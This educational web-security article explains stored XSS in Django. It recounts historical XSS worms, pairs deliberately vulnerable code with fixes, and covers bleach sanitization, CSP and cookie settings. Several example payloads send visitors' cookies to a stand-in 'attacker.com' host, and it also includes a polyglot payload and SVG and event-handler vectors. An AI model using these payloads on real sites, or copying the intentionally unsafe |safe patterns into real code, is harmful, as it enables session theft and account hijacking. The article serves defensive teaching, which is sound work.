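Stored XSS: Persistent Cross-Site Scripting

luk · Filed under Web-Security

2025-01-15 · about 2,800 words · estimated reading time 14 minutes

⚠️ Disclaimer: This article is for educational purposes only. Do not use the techniques described here against any system without authorization, or for any malicious purpose.

📚 Key points

🎯 Understand how Stored XSS works and the damage it can cause
💣 Meet the most famous XSS worms in history
🛡️ Learn a complete defense strategy for content stored in a database
💼 Master Django best practices

Reading time: about 20 minutes · Difficulty: ⭐⭐⭐ Intermediate to advanced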

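1️⃣ What is Stored XSS?

📖 Definition

Stored XSS (persistent cross-site scripting) is an attack in which a malicious script is saved on the target server (in a database, the file system, a message forum, and so on). When other users load a page that includes the stored script, their browsers execute it automatically.

💣 Why is it the most dangerous kind of XSS?

Characteristic	Reflected XSS	Stored XSS
Scope of impact	A single user	🔴 Every user who visits the page
Propagation	Victim must be tricked into clicking	🔴 Spreads automatically
Duration	One-off	🔴 Persists until removed
Attack difficulty	Lower	Higher
Detection difficulty	Easier	🔴 Harder
Cleanup difficulty	Nothing to clean up	🔴 The database must be cleaned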

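🔄 Attack flow

Step 1: The attacker submits a malicious script
        ↓
Step 2: The server stores it in the database (no validation, no encoding)
        ↓
Step 3: Other users visit the page
        ↓
Step 4: The server reads the content from the database and renders it
        ↓
Step 5: The victim's browser executes the malicious script
        ↓
Step 6: Cookies are stolen / accounts are hijacked / a worm spreads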
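
The flow above can be sketched with nothing but the Python standard library. This is a minimal illustration rather than real server code: the in-memory list stands in for the database, and the function names `submit_comment`, `render_unsafe`, and `render_escaped` are hypothetical.

```python
import html

# In-memory stand-in for the database table (hypothetical, illustration only).
stored_comments = []

def submit_comment(text):
    """Steps 1-2: the server stores whatever the user sent."""
    stored_comments.append(text)

def render_unsafe():
    """Step 4 without encoding: stored text is pasted into the page as-is."""
    return "".join(f"<p>{c}</p>" for c in stored_comments)

def render_escaped():
    """Step 4 with output encoding: HTML metacharacters become entities."""
    return "".join(f"<p>{html.escape(c)}</p>" for c in stored_comments)

submit_comment("Meeting tomorrow, please be on time")
submit_comment("<script>alert('XSS')</script>")

print(render_unsafe())   # contains a live <script> element
print(render_escaped())  # the same text, rendered inert
```

The stored data is identical in both cases. What differs is whether the page treats it as markup or as text, which is why output encoding shows up in every defense discussed later.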

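🌟 An everyday analogy

Picture a public bulletin board.

Normal use:

Xiao Ming pins up a note: "Meeting tomorrow, please be on time"
Everyone who reads it knows there is a meeting tomorrow

Stored XSS attack:

The attacker pins up a note: "Meeting tomorrow, please be on time. [hidden poison 💉]"
Everyone who reads the board gets poisoned
The poison stays on the board until someone notices it and removes it

The key difference:

Reflected XSS = the attacker hands the poison to victims one at a time (each one has to be tricked)
Stored XSS = the attacker poisons the public water supply (it reaches everyone automatically)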

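2️⃣ Real-world case studies

Case 1: The MySpace Samy worm (2005) 🐛

The most famous XSS worm in history

Attacker: Samy Kamkar (19 years old at the time)

Vulnerability details:

MySpace profile pages did not filter user input correctly
Samy injected self-propagating JavaScript into his own profile

Attack code (simplified; the helper functions are placeholders, not the real worm):

<!-- Runs whenever someone views Samy's profile page -->
<div id="mycode">
<script>
// 1. Identify the visitor
var friendID = getViewerID();

// 2. Add Samy as a friend and add "Samy is my hero" to the visitor's profile
addFriend('Samy');
addMessage('Samy is my hero');

// 3. Copy this code into the visitor's profile (this is what makes it a worm)
var payload = document.getElementById('mycode').innerHTML;
updateProfile(payload);
</script>
</div>

Propagation speed (approximate):

Hour 1: a few dozen profiles infected
Hour 8: several thousand infected
Hour 20: about 1 million infected! 🚀
In the end: MySpace had to take the site offline for emergency maintenance

Aftermath:

Samy's home was raided by the U.S. Secret Service; he pleaded guilty and was sentenced to three years of probation
MySpace is reported to have lost millions of dollars
The incident became the classic case study in the history of XSS

Lesson: Stored XSS + self-replication = catastrophic impact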
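
To see why self-replication changes the picture, here is a small, purely illustrative simulation. It is not based on MySpace's real data: the `views` list and the user names are made up, and `simulate_worm` is a hypothetical helper.

```python
def simulate_worm(views, patient_zero):
    """Replay page views in order and return the set of infected profiles.

    views: ordered list of (viewer, profile_owner) pairs.
    """
    infected = {patient_zero}
    for viewer, owner in views:
        # Viewing an infected profile copies the payload into the viewer's profile.
        if owner in infected:
            infected.add(viewer)
    return infected

views = [
    ("alice", "samy"),   # alice views samy's profile
    ("bob", "alice"),    # bob views alice's (now infected) profile
    ("carol", "dave"),   # dave is still clean at this point
    ("dave", "bob"),     # dave views bob's infected profile
    ("erin", "dave"),    # erin views dave's profile after dave was infected
]

print(sorted(simulate_worm(views, "samy")))
```

Only alice ever visited the attacker's own page. Everyone else was infected by a profile that had itself been infected earlier, so the number of infectious pages grows with every victim.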

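Case 2: The Twitter XSS worm (2010)

Vulnerability details:

Twitter did not correctly escape tweet content, so an onmouseover event handler could be injected into the markup generated for a tweet

Attack code (simplified illustration, not the original payload; getCurrentTweetID is a placeholder):

<!-- Fires when the mouse moves over the tweet -->
<a href="#" onmouseover="
  // 1. Pop up an alert box
  alert('XSS');

  // 2. Automatically retweet this tweet (worm propagation)
  $.post('/retweet', {id: getCurrentTweetID()});
">hover here</a>

Impact:

Tens of thousands of users affected
High-profile accounts were hit, including then White House press secretary Robert Gibbs and Sarah Brown
Twitter rushed out a fix for the vulnerability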

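Case 3: TweetDeck XSS (2014)

Vulnerability details:

TweetDeck (an official Twitter client) did not correctly escape HTML contained in tweets

Attack payload:

<script class="xss">
$('.xss').parents().eq(1).find('a').eq(1).click();
$('[data-action=retweet]').click();
alert('XSS in Tweetdeck');
</script>

Effect:

Automatic retweets from every account that rendered the tweet
An alert dialog popping up for each affected user
Viral spread within a short time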

3️⃣ Application scenarios that are easy to attack

Scenario 1: Guestbook / comment system

❌ Dangerous example (Django)

# models.py
from django.db import models

class Comment(models.Model):
    author = models.CharField(max_length=100)
    content = models.TextField()  # Dangerous: stores unfiltered HTML
    created_at = models.DateTimeField(auto_now_add=True)

# views.py
from django.shortcuts import render, redirect
from .models import Comment

def add_comment(request):
    if request.method == 'POST':
        author = request.POST.get('author')
        content = request.POST.get('content')

        # Dangerous: stores user input directly, with no validation or sanitization
        Comment.objects.create(
            author=author,
            content=content
        )

        return redirect('comments')

    return render(request, 'add_comment.html')

def view_comments(request):
    comments = Comment.objects.all()
    return render(request, 'comments.html', {'comments': comments})

<!-- templates/comments.html -->
<div class="comments">
{% for comment in comments %}
    <div class="comment">
        <strong>{{ comment.author }}</strong>
        <!-- Dangerous: |safe bypasses auto-escaping -->
        <p>{{ comment.content|safe }}</p>
    </div>
{% endfor %}
</div>

Attack payload:

<script>
// Steal the cookies of every visitor
fetch('http://attacker.com/steal?cookie=' + document.cookie);
</script>

✅ Safe example (Django)

# models.py
from django.db import models

class Comment(models.Model):
    author = models.CharField(max_length=100)
    content = models.TextField()  # Stores plain text or sanitized content
    created_at = models.DateTimeField(auto_now_add=True)

    class Meta:
        ordering = ['-created_at']

# forms.py
from django import forms
import bleach

class CommentForm(forms.Form):
    author = forms.CharField(
        max_length=100,
        required=True,
        strip=True
    )
    content = forms.CharField(
        widget=forms.Textarea,
        max_length=5000,
        required=True,
        strip=True
    )

    def clean_content(self):
        """Sanitize the content by removing all HTML tags."""
        content = self.cleaned_data['content']

        # Option 1: strip every HTML tag (safest)
        clean_content = bleach.clean(content, tags=[], strip=True)

        # Option 2: allow a few safe tags (use with care)
        # allowed_tags = ['p', 'br', 'strong', 'em']
        # clean_content = bleach.clean(
        #     content,
        #     tags=allowed_tags,
        #     strip=True
        # )

        return clean_content

# views.py
from django.shortcuts import render, redirect
from django.contrib import messages
from .models import Comment
from .forms import CommentForm

def add_comment(request):
    if request.method == 'POST':
        form = CommentForm(request.POST)

        if form.is_valid():
            # Use the validated and sanitized data
            Comment.objects.create(
                author=form.cleaned_data['author'],
                content=form.cleaned_data['content']
            )
            messages.success(request, 'Comment posted')
            return redirect('comments')
        else:
            messages.error(request, 'Invalid comment')
    else:
        form = CommentForm()

    return render(request, 'add_comment.html', {'form': form})

def view_comments(request):
    comments = Comment.objects.all()
    return render(request, 'comments.html', {'comments': comments})

<!-- templates/comments.html -->
<div class="comments">
{% for comment in comments %}
    <div class="comment">
        <!-- ✅ Safe: Django auto-escapes HTML -->
        <strong>{{ comment.author }}</strong>
        <!-- ✅ Safe: content was sanitized during form validation and is auto-escaped here -->
        <p>{{ comment.content }}</p>
    </div>
{% endfor %}
</div>

<!-- templates/add_comment.html -->
<form method="post">
    {% csrf_token %}
    {{ form.as_p }}
    <button type="submit">Post comment</button>
</form>

{% if messages %}
<ul class="messages">
    {% for message in messages %}
    <li class="{{ message.tags }}">{{ message }}</li>
    {% endfor %}
</ul>
{% endif %}
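
One side effect of sanitizing on input and escaping again on output is worth knowing about. As far as I understand its behavior, bleach.clean returns text in which characters such as < and & are already HTML-escaped, so the template's auto-escaping then encodes them a second time. The sketch below reproduces that effect with the standard library's html.escape standing in for both steps; it is an approximation of the pipeline, not bleach itself.

```python
import html

raw = "if a < b && b > c"

once = html.escape(raw)    # roughly what a sanitize-on-input step stores
twice = html.escape(once)  # what output escaping then produces from the stored value

print(once)
print(twice)

# A browser decodes entities once, so the visitor would see `once`, not `raw`.
print(html.unescape(twice) == once)
```

For plain-text fields this is harmless from a security standpoint (double encoding never creates markup), but it can show literal `&lt;` to readers. One option is to store plain-text fields unmodified and rely on auto-escaping alone, keeping bleach for fields that are rendered with |safe.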

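Scenario 2: User profiles

❌ Dangerous example

# models.py
from django.contrib.auth.models import User
from django.db import models

class UserProfile(models.Model):
    # related_name='profile' is what makes request.user.profile work in the views
    user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='profile')
    bio = models.TextField(blank=True)  # Dangerous: free-form self-introduction
    website = models.URLField(blank=True)  # Dangerous: URLField validators only run through forms or full_clean()
    signature = models.CharField(max_length=500, blank=True)  # Dangerous: signature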

# views.py
def update_profile(request):
    profile = request.user.profile

    if request.method == 'POST':
        # Dangerous: stores user input directly
        profile.bio = request.POST.get('bio')
        profile.website = request.POST.get('website')
        profile.signature = request.POST.get('signature')
        profile.save()

        return redirect('profile', username=request.user.username)

    return render(request, 'edit_profile.html', {'profile': profile})

<!-- templates/profile.html -->
<div class="profile">
    <h2>{{ user.username }}'s profile</h2>

    <!-- Danger zone -->
    <div class="bio">{{ profile.bio|safe }}</div>
    <div class="website">
        <a href="{{ profile.website }}">Personal website</a>
    </div>
    <div class="signature">{{ profile.signature|safe }}</div>
</div>

Attack vectors:

<!-- Bio field -->
<script>
document.location='http://attacker.com?c='+document.cookie;
</script>

<!-- Website field -->
javascript:alert(document.cookie)

<!-- Signature field -->
<img src=x onerror="fetch('http://attacker.com/steal?cookie='+document.cookie)">
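
The website vector works because HTML escaping does nothing to a `javascript:` URL: it contains no characters that need escaping. The scheme itself has to be checked. Below is a minimal standard-library sketch of such a check; `is_safe_url` and `ALLOWED_SCHEMES` are hypothetical names, and in a Django project the built-in URLValidator would normally do this job.

```python
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

def is_safe_url(url):
    """Return True only for absolute http(s) URLs that have a host."""
    # Browsers tolerate whitespace and control characters inside a scheme,
    # so drop non-printable characters before inspecting it.
    cleaned = "".join(ch for ch in url.strip() if ch.isprintable())
    try:
        parts = urlsplit(cleaned)
    except ValueError:
        return False  # malformed URL (for example a broken IPv6 literal)
    return parts.scheme.lower() in ALLOWED_SCHEMES and bool(parts.netloc)

for candidate in [
    "https://example.com/me",
    "javascript:alert(document.cookie)",
    "JaVaScRiPt:alert(1)",
    "java\tscript:alert(1)",
    "data:text/html,<script>alert(1)</script>",
    "//example.com/no-scheme",
]:
    print(repr(candidate), is_safe_url(candidate))
```

The check is a whitelist of schemes rather than a search for the string "javascript:", so new or obfuscated schemes are rejected by default.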

✅ Safe example

# forms.py
from django import forms
from django.core.exceptions import ValidationError
from django.core.validators import URLValidator
import bleach

from .models import UserProfile

class ProfileForm(forms.ModelForm):
    class Meta:
        model = UserProfile
        fields = ['bio', 'website', 'signature']

    def clean_bio(self):
        bio = self.cleaned_data['bio']
        # Strip all HTML and keep plain text only
        return bleach.clean(bio, tags=[], strip=True)

    def clean_website(self):
        website = self.cleaned_data.get('website', '')

        if not website:
            return ''

        # Validate the URL format and restrict it to http/https
        validator = URLValidator(schemes=['http', 'https'])
        try:
            validator(website)
        except ValidationError:
            raise forms.ValidationError('Please enter a valid URL')

        # Defense in depth: explicitly reject the javascript: scheme
        if website.lower().startswith('javascript:'):
            raise forms.ValidationError('URL format not allowed')

        return website

    def clean_signature(self):
        signature = self.cleaned_data['signature']

        # Allow a few formatting tags
        allowed_tags = ['b', 'i', 'u']
        clean_signature = bleach.clean(
            signature,
            tags=allowed_tags,
            strip=True
        )

        return clean_signature

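# views.py
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.shortcuts import get_object_or_404, redirect, render

from .forms import ProfileForm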

@login_required
def update_profile(request):
    profile = request.user.profile

    if request.method == 'POST':
        form = ProfileForm(request.POST, instance=profile)

        if form.is_valid():
            form.save()
            messages.success(request, 'Profile updated')
            return redirect('profile', username=request.user.username)
    else:
        form = ProfileForm(instance=profile)

    return render(request, 'edit_profile.html', {'form': form})

@login_required
def view_profile(request, username):
    user = get_object_or_404(User, username=username)
    profile = user.profile

    return render(request, 'profile.html', {
        'user': user,
        'profile': profile
    })

<!-- templates/profile.html -->
<div class="profile">
    <h2>{{ user.username }}'s profile</h2>

    <!-- ✅ Safe: sanitized on save and auto-escaped here -->
    <div class="bio">{{ profile.bio }}</div>

    <!-- ✅ Safe: URL format and scheme already validated -->
    {% if profile.website %}
    <div class="website">
        <a href="{{ profile.website }}" rel="noopener noreferrer" target="_blank">
            Personal website
        </a>
    </div>
    {% endif %}

    <!-- ✅ Safe: bleach let only <b>, <i> and <u> tags through -->
    <div class="signature">{{ profile.signature|safe }}</div>
</div>

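Scenario 3: Forums / social media

❌ Dangerous example

# models.py
from django.contrib.auth.models import User
from django.db import models

class Post(models.Model):
    author = models.ForeignKey(User, on_delete=models.CASCADE)
    title = models.CharField(max_length=200)
    content = models.TextField()  # Dangerous: accepts raw HTML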
    created_at = models.DateTimeField(auto_now_add=True)

# views.py
def create_post(request):
    if request.method == 'POST':
        # Dangerous: stores HTML content directly
        Post.objects.create(
            author=request.user,
            title=request.POST['title'],
            content=request.POST['content']
        )
        return redirect('posts')

    return render(request, 'create_post.html')

<!-- templates/post_detail.html -->
<article>
    <h1>{{ post.title }}</h1>
    <div class="author">Author: {{ post.author.username }}</div>

    <!-- Dangerous: renders the HTML as-is -->
    <div class="content">
        {{ post.content|safe }}
    </div>
</article>

✅ Safe example (using Markdown)

# models.py
from django.contrib.auth.models import User
from django.db import models
import markdown
import bleach

class Post(models.Model):
    author = models.ForeignKey(User, on_delete=models.CASCADE)
    title = models.CharField(max_length=200)
    markdown_content = models.TextField()  # Stores the Markdown source
    html_content = models.TextField()  # Stores the sanitized HTML
    created_at = models.DateTimeField(auto_now_add=True)

    def save(self, *args, **kwargs):
        # Convert Markdown to HTML
        html = markdown.markdown(
            self.markdown_content,
            extensions=['extra', 'codehilite', 'nl2br']
        )

        # Sanitize the HTML, keeping only whitelisted tags
        allowed_tags = [
            'p', 'br', 'strong', 'em', 'u', 'h1', 'h2', 'h3',
            'ul', 'ol', 'li', 'code', 'pre', 'blockquote',
            'a', 'img'
        ]
        allowed_attributes = {
            'a': ['href', 'title'],
            'img': ['src', 'alt', 'title'],
            'code': ['class'],  # For syntax highlighting
        }

        self.html_content = bleach.clean(
            html,
            tags=allowed_tags,
            attributes=allowed_attributes,
            strip=True
        )

        # Turn bare URLs into links and run every link through validate_link
        self.html_content = bleach.linkify(
            self.html_content,
            callbacks=[self.validate_link]
        )

        super().save(*args, **kwargs)

    @staticmethod
    def validate_link(attrs, new=False):
        """Check that a link is safe (bleach linkify callback)."""
        href = attrs.get((None, 'href'), '')

        # Allow only http/https; returning None drops the link
        if not href.startswith(('http://', 'https://')):
            return None

        # Add safety attributes
        attrs[(None, 'rel')] = 'noopener noreferrer'
        attrs[(None, 'target')] = '_blank'

        return attrs

# forms.py
from django import forms
import bleach

from .models import Post

class PostForm(forms.ModelForm):
    class Meta:
        model = Post
        fields = ['title', 'markdown_content']
        widgets = {
            'markdown_content': forms.Textarea(attrs={
                'placeholder': 'Markdown is supported...'
            })
        }

    def clean_title(self):
        title = self.cleaned_data['title']
        # Strip HTML tags from the title
        return bleach.clean(title, tags=[], strip=True)

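# views.py
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404, redirect, render

from .forms import PostForm
from .models import Post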

@login_required
def create_post(request):
    if request.method == 'POST':
        form = PostForm(request.POST)

        if form.is_valid():
            post = form.save(commit=False)
            post.author = request.user
            post.save()  # Converts Markdown -> HTML automatically

            messages.success(request, 'Post published')
            return redirect('post_detail', pk=post.pk)
    else:
        form = PostForm()

    return render(request, 'create_post.html', {'form': form})

def post_detail(request, pk):
    post = get_object_or_404(Post, pk=pk)
    return render(request, 'post_detail.html', {'post': post})

<!-- templates/post_detail.html -->
<article>
    <!-- ✅ Safe: title already sanitized -->
    <h1>{{ post.title }}</h1>

    <div class="meta">
        Author: {{ post.author.username }}
        |
        Published: {{ post.created_at|date:"Y-m-d H:i" }}
    </div>

    <!-- ✅ Safe: HTML was sanitized and validated on save -->
    <div class="content markdown-body">
        {{ post.html_content|safe }}
    </div>

    <!-- Show the original Markdown (for editing) -->
    {% if user == post.author %}
    <details>
        <summary>View original Markdown</summary>
        <pre>{{ post.markdown_content }}</pre>
    </details>
    {% endif %}
</article>

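Why is Markdown safer?

✅ Users write Markdown, which offers far less markup than free-form HTML
✅ Converting Markdown to HTML is a controlled, server-side step
✅ The generated HTML can be sanitized again with bleach
✅ Python-Markdown passes raw HTML in the input through unchanged, so the bleach step is what actually blocks malicious markup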

4️⃣ Advanced attack techniques

Technique 1: Polyglot payloads (multi-context payloads)

A single payload that executes in several different HTML contexts:

<!-- Designed to fire in HTML, JavaScript and CSS contexts alike -->
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Technique 2: Abusing SVG

<!-- SVG can embed JavaScript -->
<svg onload="alert('XSS')">

<!-- A more elaborate SVG payload -->
<svg><script>alert&#40;'XSS'&#41;</script></svg>

<!-- Using foreignObject -->
<svg><foreignObject><body onload="alert('XSS')"></foreignObject></svg>

Technique 3: Abusing HTML5 features

<!-- autofocus + onfocus -->
<input autofocus onfocus="alert('XSS')">

<!-- formaction -->
<form><button formaction="javascript:alert('XSS')">Submit</button></form>

<!-- poster attribute (historical: current browsers do not execute javascript: URLs here) -->
<video poster="javascript:alert('XSS')">

<!-- onerror event -->
<img src=x onerror="alert('XSS')">
<audio src=x onerror="alert('XSS')">
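
What these payloads have in common is that none of them needs a literal `<script>` tag in an obvious place: the code rides in on event-handler attributes and `javascript:` URLs. The sketch below uses the standard library's HTMLParser to list such vectors in a fragment. It is an illustration of where executable content can hide, not a sanitizer, and `ScriptVectorFinder`, `find_vectors`, and `URL_ATTRS` are hypothetical names.

```python
from html.parser import HTMLParser

# Attributes that can carry a URL (an illustrative, incomplete list).
URL_ATTRS = {"href", "src", "formaction", "poster", "action"}

class ScriptVectorFinder(HTMLParser):
    """Collects (tag, reason) pairs for markup that can run script."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        if tag == "script":
            self.findings.append((tag, "<script> element"))
        for name, value in attrs:
            value = (value or "").strip().lower()
            if name.startswith("on"):
                self.findings.append((tag, f"event handler {name}"))
            elif name in URL_ATTRS and value.startswith("javascript:"):
                self.findings.append((tag, f"javascript: URL in {name}"))

def find_vectors(markup):
    finder = ScriptVectorFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings

print(find_vectors('<svg onload="alert(1)">'))
print(find_vectors('<input autofocus onfocus="alert(1)">'))
print(find_vectors('<form><button formaction="javascript:alert(1)">x</button></form>'))
```

Because the set of event handlers and URL-bearing attributes keeps growing, a finder like this is only useful for auditing. For filtering, the defenses in the next section whitelist what is allowed instead.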

5️⃣ A complete defense strategy

Layered defense architecture

┌─────────────────────────────────────────────┐
│  Layer 1: Input Validation                  │
│  - Django Forms                             │
│  - Length limits                            │
│  - Format validation                        │
└─────────────────────────────────────────────┘
              ↓
┌─────────────────────────────────────────────┐
│  Layer 2: Sanitization ⭐                   │
│  - Bleach (HTML whitelist filtering)        │
│  - Markdown (recommended)                   │
└─────────────────────────────────────────────┘
              ↓
┌─────────────────────────────────────────────┐
│  Layer 3: Output Encoding ⭐                │
│  - Django Template Auto-escaping            │
│  - Avoid |safe                              │
└─────────────────────────────────────────────┘
              ↓
┌─────────────────────────────────────────────┐
│  Layer 4: CSP (Content Security Policy)     │
│  - script-src 'self'                        │
│  - no inline scripts                        │
└─────────────────────────────────────────────┘
              ↓
┌─────────────────────────────────────────────┐
│  Layer 5: Cookie security                   │
│  - HttpOnly                                 │
│  - Secure                                   │
│  - SameSite                                 │
└─────────────────────────────────────────────┘
              ↓
┌─────────────────────────────────────────────┐
│  Layer 6: Monitoring and auditing           │
│  - Log all user submissions                 │
│  - Anomaly detection                        │
└─────────────────────────────────────────────┘
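
Layers 4 and 5 come down to a handful of response headers. As a framework-independent sketch of what those headers look like on the wire, the snippet below builds them with the standard library. The `build_csp` helper, the policy contents, and the session value are assumptions for illustration; in Django, django-csp and the cookie settings shown in the next listing emit the equivalent headers.

```python
from http.cookies import SimpleCookie

def build_csp(policy):
    """Join a {directive: [sources]} mapping into a CSP header value."""
    return "; ".join(f"{name} {' '.join(sources)}" for name, sources in policy.items())

policy = {
    "default-src": ["'none'"],
    "script-src": ["'self'"],   # no 'unsafe-inline': injected inline scripts are blocked
    "style-src": ["'self'"],
    "img-src": ["'self'", "https:"],
}

cookie = SimpleCookie()
cookie["sessionid"] = "opaque-session-token"   # hypothetical value
cookie["sessionid"]["httponly"] = True         # not readable via document.cookie
cookie["sessionid"]["secure"] = True           # sent over HTTPS only
cookie["sessionid"]["samesite"] = "Strict"     # not sent on cross-site requests

headers = {
    "Content-Security-Policy": build_csp(policy),
    "Set-Cookie": cookie["sessionid"].OutputString(),
}

for name, value in headers.items():
    print(f"{name}: {value}")
```

Neither header removes a stored payload. CSP limits what an injected script can do or whether it runs at all, and HttpOnly keeps the session cookie out of its reach, which is why both sit behind sanitization and output encoding rather than replacing them.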

Complete Django security configuration

# settings.py
import os

# ==================== Basic security ====================
DEBUG = False
SECRET_KEY = os.environ['SECRET_KEY']  # Fail fast if the variable is missing
ALLOWED_HOSTS = ['example.com', 'www.example.com']

# ==================== Cookie security ====================
SESSION_COOKIE_HTTPONLY = True
SESSION_COOKIE_SECURE = True  # Sent over HTTPS only
SESSION_COOKIE_SAMESITE = 'Strict'
SESSION_COOKIE_AGE = 3600  # Expires after 1 hour

CSRF_COOKIE_HTTPONLY = True
CSRF_COOKIE_SECURE = True
CSRF_COOKIE_SAMESITE = 'Strict'

# ==================== CSP (using django-csp) ====================
# pip install django-csp
MIDDLEWARE = [
    # ...
    'csp.middleware.CSPMiddleware',
]

CSP_DEFAULT_SRC = ("'none'",)
CSP_SCRIPT_SRC = ("'self'",)
CSP_STYLE_SRC = ("'self'",)
CSP_IMG_SRC = ("'self'", "data:", "https:")
CSP_FONT_SRC = ("'self'",)
CSP_CONNECT_SRC = ("'self'",)
CSP_FRAME_ANCESTORS = ("'none'",)
CSP_BASE_URI = ("'self'",)
CSP_FORM_ACTION = ("'self'",)

# Nonce for inline scripts (if needed)
CSP_INCLUDE_NONCE_IN = ['script-src']

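# ==================== Security Headers ====================
# SECURE_BROWSER_XSS_FILTER was removed in Django 4.0 (browsers have dropped
# support for X-XSS-Protection); set it only on older Django versions.
SECURE_CONTENT_TYPE_NOSNIFF = True
X_FRAME_OPTIONS = 'DENY'

SECURE_SSL_REDIRECT = True  # Force HTTPS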
SECURE_HSTS_SECONDS = 31536000  # 1 year
SECURE_HSTS_INCLUDE_SUBDOMAINS = True
SECURE_HSTS_PRELOAD = True

# ==================== Template settings ====================
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'OPTIONS': {
            'context_processors': [
                # ...
            ],
            'autoescape': True,  # ✅ Make sure this stays on (True is the default)
        },
    },
]

# ==================== Required packages ====================
# requirements.txt:
# django-csp==3.7
# bleach[css]==6.0.0  # the css extra is required by bleach.css_sanitizer
# markdown==3.4.3

Sanitizing HTML with Bleach

# utils/sanitizer.py
import bleach
from bleach.css_sanitizer import CSSSanitizer

# Default whitelist of safe tags
ALLOWED_TAGS = [
    'p', 'br', 'strong', 'em', 'u', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6',
    'blockquote', 'code', 'pre', 'ul', 'ol', 'li', 'a', 'img', 'hr',
    'table', 'thead', 'tbody', 'tr', 'th', 'td'
]

ALLOWED_ATTRIBUTES = {
    'a': ['href', 'title', 'rel'],
    'img': ['src', 'alt', 'title', 'width', 'height'],
    'code': ['class'],  # For syntax highlighting
    'pre': ['class'],
    'table': ['class'],
    'th': ['class'],
    'td': ['class'],
}

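# CSS properties permitted inside style attributes. This only takes effect for
# tags whose whitelist in ALLOWED_ATTRIBUTES includes 'style' (none do above).
ALLOWED_STYLES = ['color', 'background-color', 'font-weight', 'text-align']

css_sanitizer = CSSSanitizer(allowed_css_properties=ALLOWED_STYLES)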

def sanitize_html(html_content, allowed_tags=None, allowed_attributes=None):
    """
    Sanitize HTML content by removing dangerous tags and attributes.

    Args:
        html_content: the HTML string to sanitize
        allowed_tags: list of allowed tags (optional)
        allowed_attributes: dict of allowed attributes (optional)

    Returns:
        The sanitized HTML string
    """
    if allowed_tags is None:
        allowed_tags = ALLOWED_TAGS

    if allowed_attributes is None:
        allowed_attributes = ALLOWED_ATTRIBUTES

    # Sanitize the HTML
    clean_html = bleach.clean(
        html_content,
        tags=allowed_tags,
        attributes=allowed_attributes,
        css_sanitizer=css_sanitizer,
        strip=True,  # Remove disallowed tags instead of escaping them
        strip_comments=True  # Remove HTML comments
    )

    # Process links
    clean_html = bleach.linkify(
        clean_html,
        callbacks=[validate_link],
        skip_tags=['pre', 'code']  # Do not auto-link inside code blocks
    )

    return clean_html

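def validate_link(attrs, new=False):
    """Check that a link is safe (bleach linkify callback)."""
    href = attrs.get((None, 'href'), '').strip()
    lowered = href.lower()

    # Allow only http/https/mailto (compared case-insensitively)
    if not lowered.startswith(('http://', 'https://', 'mailto:')):
        return None

    # Block the javascript: scheme anywhere in the URL
    if 'javascript:' in lowered:
        return None

    # Add safety attributes
    attrs[(None, 'rel')] = 'noopener noreferrer'
    if lowered.startswith(('http://', 'https://')):
        attrs[(None, 'target')] = '_blank'

    return attrs

def sanitize_text(text):
    """
    Remove every HTML tag and keep plain text only.

    Use for fields that should carry no formatting at all: user names, titles, etc.
    """
    return bleach.clean(text, tags=[], strip=True)


# Usage example
if __name__ == '__main__':
    # Test 1: neutralize malicious markup
    malicious_html = '''
    <p>Normal content</p>
    <script>alert('XSS')</script>
    <img src=x onerror="alert('XSS')">
    '''
    print(sanitize_html(malicious_html))
    # The <p> survives. The <script> tags are stripped, but their text
    # (alert('XSS')) stays behind as inert text. <img> keeps src and loses onerror.

    # Test 2: keep plain text only
    text_with_html = '<strong>username</strong><script>alert(1)</script>'
    print(sanitize_text(text_with_html))
    # Tags are stripped but their text is kept: usernamealert(1)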
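
To make the whitelist idea concrete without depending on bleach, here is a deliberately tiny sanitizer built on the standard library's HTMLParser. It is a teaching sketch only and should not replace a maintained library: it ignores unbalanced tags and many other edge cases. `WhitelistSanitizer`, `sanitize`, and the `ALLOWED` table are hypothetical names.

```python
import html
from html.parser import HTMLParser

# Whitelist: tag -> set of attributes that tag may keep.
ALLOWED = {"p": set(), "b": set(), "i": set(), "a": {"href"}}

class WhitelistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # unknown tag: drop the tag itself, keep any text inside it
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED[tag]:
                continue  # drops onclick, onerror, style, ...
            if name == "href" and not value.lower().startswith(("http://", "https://")):
                continue  # drops javascript: and other schemes
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # All text is re-escaped, so it can never turn back into markup.
        self.out.append(html.escape(data))

def sanitize(markup):
    parser = WhitelistSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)

print(sanitize("<p>Hello</p><script>alert(1)</script>"))
print(sanitize('<a href="javascript:alert(1)" onclick="x()">go</a>'))
print(sanitize("<img src=x onerror=alert(1)>"))
```

Note that the text inside the removed `<script>` element is kept as plain text, which mirrors what stripping does in the bleach example above. The output is harmless, but the leftover text may still look odd to readers.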

Using it in Django

# models.py
from django.contrib.auth.models import User
from django.db import models
from utils.sanitizer import sanitize_html, sanitize_text

class BlogPost(models.Model):
    title = models.CharField(max_length=200)
    raw_content = models.TextField()  # Original content (Markdown or HTML)
    clean_content = models.TextField()  # Sanitized HTML
    author = models.ForeignKey(User, on_delete=models.CASCADE)

    def save(self, *args, **kwargs):
        # Sanitize the content before saving
        self.title = sanitize_text(self.title)
        self.clean_content = sanitize_html(self.raw_content)
        super().save(*args, **kwargs)

# views.py
from django.shortcuts import render, get_object_or_404
from .models import BlogPost

def post_detail(request, pk):
    post = get_object_or_404(BlogPost, pk=pk)

    return render(request, 'post_detail.html', {
        'post': post
    })

<!-- templates/post_detail.html -->
<article>
